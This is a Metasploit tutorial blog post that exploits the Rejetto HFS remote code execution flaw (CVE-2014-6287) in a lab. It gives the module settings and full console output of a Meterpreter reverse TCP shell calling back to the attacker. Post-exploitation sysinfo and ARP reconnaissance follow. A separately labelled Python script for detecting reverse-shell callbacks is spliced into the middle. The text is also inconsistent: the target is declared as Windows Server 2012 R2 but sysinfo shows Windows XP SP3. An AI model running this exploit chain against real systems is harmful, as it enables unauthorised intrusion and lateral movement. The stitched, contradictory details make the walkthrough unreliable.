Metasploit in Practice, Part 3: Using Metasploit to Gain Control of the Target

Please cite the source when reprinting: https://blog.csdn.net/l1028386804/article/details/86607498

Attacker machine: Kali 192.168.175.128

Target machine: Win2012 R2 192.168.175.130

In the previous post, "Threat Modeling the Target (with Setting Up the CVE-2014-6287 Vulnerable Environment)", we identified the vulnerability on the target system and the Metasploit module that can exploit it. In this post we actually take control of the target.

msfconsole
use exploit/windows/http/rejetto_hfs_exec
set RHOST 192.168.175.130
set RPORT 8080
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.175.128
exploit

The full session looks like this:

msf5 > use exploit/windows/http/rejetto_hfs_exec 
msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOST 192.168.175.130
RHOST => 192.168.175.130
msf5 exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080
RPORT => 8080
msf5 exploit(windows/http/rejetto_hfs_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.175.130  yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.175.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 192.168.175.128:4444 
[*] Using URL: http://0.0.0.0:8080/OHqKAjyg9dj9u
[*] Local IP: http://192.168.175.128:8080/OHqKAjyg9dj9u
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /OHqKAjyg9dj9u
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1091) at 2019-01-23 11:32:15 +0800
[!] Tried to delete %TEMP%\OmpsEelxzVs.vbs, unknown result
[*] Server stopped.

meterpreter > 

Once the exploit has run, we have control of the target host.
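From the defender's side, the console output above exposes a recognisable sequence in network logs: the HFS server first receives a request from the attacker on its service port 8080, then itself connects out to the attacker's web server on 8080 to fetch the stager, and finally opens the reverse TCP connection to port 4444. A service that initiates connections back to a client that has just contacted it is a strong reverse-shell indicator. The following Python script is an added example that is not part of the original post or of Metasploit; the flow-record format, the sample records (built from the addresses and ports shown above) and the helper names `parse_flows`, `find_callbacks` and `summarize` are constructed assumptions.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed connection records, one per new TCP connection, in time order.
# Format: "<epoch_seconds> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <proto>"
# Values mirror the walkthrough: the attacker (192.168.175.128) contacts the
# HFS service on 192.168.175.130:8080; the server then fetches the stager from
# the attacker on port 8080 and calls back to port 4444. The host .131 is an
# ordinary client that only ever connects inbound and must not be flagged.
SAMPLE_FLOWS = """\
1548214320 192.168.175.131:49211 -> 192.168.175.130:8080 tcp
1548214330 192.168.175.128:51234 -> 192.168.175.130:8080 tcp
1548214331 192.168.175.130:1090 -> 192.168.175.128:8080 tcp
1548214335 192.168.175.130:1091 -> 192.168.175.128:4444 tcp
1548214400 192.168.175.131:49300 -> 192.168.175.130:8080 tcp
"""

FLOW_RE = re.compile(
    r"^(?P<ts>\d+) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<proto>\w+)$"
)


@dataclass(frozen=True)
class Flow:
    ts: int
    src: str
    sport: int
    dst: str
    dport: int


def parse_flows(text):
    """Parse the constructed record format into Flow objects."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = FLOW_RE.match(line)
        if not m:
            raise ValueError(f"unparseable flow record: {line!r}")
        flows.append(Flow(int(m["ts"]), m["src"], int(m["sport"]),
                          m["dst"], int(m["dport"])))
    return flows


def find_callbacks(flows, server_ip, server_port, window=60):
    """Flag outbound connections from the server to any client that
    contacted the service port within the last `window` seconds.

    Returns a list of (client_ip, inbound_ts, outbound_flow) tuples.
    """
    last_inbound = {}   # client ip -> timestamp of its latest inbound hit
    alerts = []
    for f in sorted(flows, key=lambda fl: fl.ts):
        if f.dst == server_ip and f.dport == server_port:
            last_inbound[f.src] = f.ts
        elif f.src == server_ip and f.dst in last_inbound:
            if f.ts - last_inbound[f.dst] <= window:
                alerts.append((f.dst, last_inbound[f.dst], f))
    return alerts


def summarize(alerts):
    """Group flagged callback ports by the client they went to."""
    by_client = defaultdict(list)
    for client, _, flow in alerts:
        by_client[client].append(flow.dport)
    return dict(by_client)


if __name__ == "__main__":
    hits = find_callbacks(parse_flows(SAMPLE_FLOWS), "192.168.175.130", 8080)
    for client, ts, flow in hits:
        print(f"server called back to {client}:{flow.dport} "
              f"{flow.ts - ts}s after that client hit the service port")
    print(summarize(hits))
```

Run as-is, the script flags only the two connections to 192.168.175.128 (ports 8080 and 4444) and ignores the benign client .131. Any firewall or NetFlow export that can be normalised into source/destination pairs with a timestamp will do as input; legitimate callbacks (for example an authentication service the server must consult) should be allow-listed rather than by widening the window.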

Next, we check whether there are other hosts on the internal network, as shown below:

meterpreter > sysinfo
Computer        : LIUYAZHUANG
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 
meterpreter > arp

ARP cache
=========

    IP address       MAC address        Interface
    ----------       -----------        ---------
    192.168.175.2    00:50:56:e7:f5:30  2
    192.168.175.128  00:0c:29:68:65:5b  2
    192.168.175.131  00:0c:29:cf:f6:ac  2

meterpreter > 

We can see that there is another host on the internal network at 192.168.175.131.
